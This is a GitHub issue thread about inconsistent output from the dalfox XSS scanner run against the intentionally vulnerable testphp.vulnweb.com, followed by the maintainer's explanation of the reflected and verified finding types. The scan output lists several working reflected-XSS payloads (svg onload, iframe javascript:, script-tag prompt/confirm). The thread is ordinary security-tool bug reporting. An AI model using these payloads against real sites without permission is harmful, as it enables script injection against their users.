Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Inconsistent output #469

Open
ocervell opened this issue May 8, 2023 · 1 comment
Open

Inconsistent output #469

ocervell opened this issue May 8, 2023 · 1 comment
Labels
bug Something isn't working

Comments

@ocervell
Copy link

ocervell commented May 8, 2023

Describe the bug

I've been running dalfox on the same URL over and over again, here are the results:

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?pleasedonthaveanamelikethis_plz_plz=DalFox","param":"","payload":"DalFox","evidence":"","cwe":"","severity":"Low","message_id":3,"message_str":"Found dalfox-error-mysql2 via built-in grepping / payload: DalFox"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CdETAILS%250aopen%250aonToGgle%250a%3D%250aa%3Dprompt%2Ca%28%29+class%3Ddalfox%3E","param":"cat","payload":"\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e","evidence":"48 line:  yntax to use near '=\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e'","cwe":"CWE-79","severity":"High","message_id":219,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cdETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() class=dalfox\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aprint%281%29%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e","evidence":"48 line:  yntax to use near '=\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":351,"message_str":"Reflected Payload in HTML: cat=\u003ciFrAme/src=jaVascRipt:print(1)\u003e\u003c/iFramE\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aconfirm%281%29+class%3Ddalfox%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e","evidence":"48 line:  yntax to use near '=\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e' at","cwe":"CWE-79","severity":"High","message_id":275,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003ciFrAme/src=jaVascRipt:confirm(1) class=dalfox\u003e\u003c/iFramE\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%22%3E%3CSvg%2Fonload%3Dalert%281%29+class%3Ddlafox%3E","param":"cat","payload":"\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e","evidence":"48 line:  syntax to use near '\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":435,"message_str":"Reflected Payload in HTML: cat=\"\u003e\u003cSvg/onload=alert(1) class=dlafox\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CScRipt+class%3Ddalfox%3Eprompt.valueOf%28%29%281%29%3C%2Fscript%3E","param":"cat","payload":"\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e","evidence":"48 line:  yntax to use near '=\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":187,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cScRipt class=dalfox\u003eprompt.valueOf()(1)\u003c/script\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"R","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert.bind%28%29%281%29%3E%3C%2FiFramE%3E","param":"cat","payload":"\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e","evidence":"48 line:  yntax to use near '=\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e' at line 1","cwe":"CWE-79","severity":"Medium","message_id":343,"message_str":"Reflected Payload in HTML: cat=\u003ciFrAme/src=jaVascRipt:alert.bind()(1)\u003e\u003c/iFramE\u003e"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CsVg%2Fonload%3Dprompt.valueOf%28%29%281%29+class%3Ddalfox%3E","param":"cat","payload":"\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e","evidence":"48 line:  yntax to use near '=\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":163,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003csVg/onload=prompt.valueOf()(1) class=dalfox\u003e"},
{}]

$ dalfox --silence url http://testphp.vulnweb.com/listproducts.php --format json --worker 50
[
{"type":"G","inject_type":"BUILTIN","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php","param":"","payload":"","evidence":"","cwe":"","severity":"Low","message_id":2,"message_str":"Found dalfox-error-mysql2 via built-in grepping / original request"},
{"type":"V","inject_type":"inHTML-none(1)-URL","poc_type":"plain","method":"GET","data":"http://testphp.vulnweb.com/listproducts.php?cat=%3CScRipt+class%3Ddalfox%3Econfirm%281%29%3C%2Fscript%3E","param":"cat","payload":"\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e","evidence":"48 line:  yntax to use near '=\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e' at line 1","cwe":"CWE-79","severity":"High","message_id":175,"message_str":"Triggered XSS Payload (found DOM Object): cat=\u003cScRipt class=dalfox\u003econfirm(1)\u003c/script\u003e"},
{}]

As you can see, the reflected XSS does not show up across all the runs. Any ideas why ?

Environment

  • Dalfox Version: latest
  • Installed from: go install -v github.com/hahwul/dalfox/v2@latest
@ocervell ocervell added the bug Something isn't working label May 8, 2023
@hahwul
Copy link
Owner

hahwul commented May 16, 2023

Hi @ocervell
Dalfox does not output R type if the vulnerability is identified as V type. Looking at the information you sent, it seems that all V types are included.

The reason why the R type is not printed when checking with V type is to prevent indiscriminate R output. Sometimes, Although it is a V type, the R output is caused by fast concurrency processing.

  • R: Found payload reflection.
  • V: DOM Parser, Headless Browser confirms that actual attack code is likely to be injected and executed
    • In most cases, the V Type check is preceded by the R Type check.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

2 participants